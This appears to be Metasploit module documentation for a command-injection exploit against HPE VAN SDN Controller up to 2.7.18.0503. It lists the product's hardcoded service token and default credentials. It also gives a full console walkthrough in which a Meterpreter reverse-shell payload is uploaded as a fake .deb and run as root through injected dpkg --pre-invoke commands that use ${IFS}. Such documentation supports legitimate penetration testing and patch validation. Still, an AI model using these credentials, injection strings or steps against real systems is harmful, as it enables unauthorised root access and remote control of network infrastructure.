## Introduction

This module exploits a hardcoded service token or default credentials in
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.

A root command injection was discovered in the uninstall action's name
parameter, obviating the need to use sudo for privilege escalation.

If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
will be used for authentication. An additional login request will be
sent.

## Setup

Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.

Tested on 2.7.18.0503.

## Options

**RPORT**

Set this to the port for the REST API, usually 8081.

**WEBUI_PORT**

Set this to the port for the web UI, usually 8443.

**TOKEN**

Set this to the service token. Defaults to `AuroraSdnToken37`.

**USERNAME**

Set this to the service username. Defaults to `sdn`.

**PASSWORD**

Set this to the service password. Defaults to `skyline`.

## Usage

```
msf5 > use exploit/linux/http/hp_van_sdn_cmd_inject
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102
rhosts => 192.168.56.102
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set token ""
token =>
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Retrieved auth token 26d7b53a73a9455eae63c346321bfe31
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l

meterpreter >
```
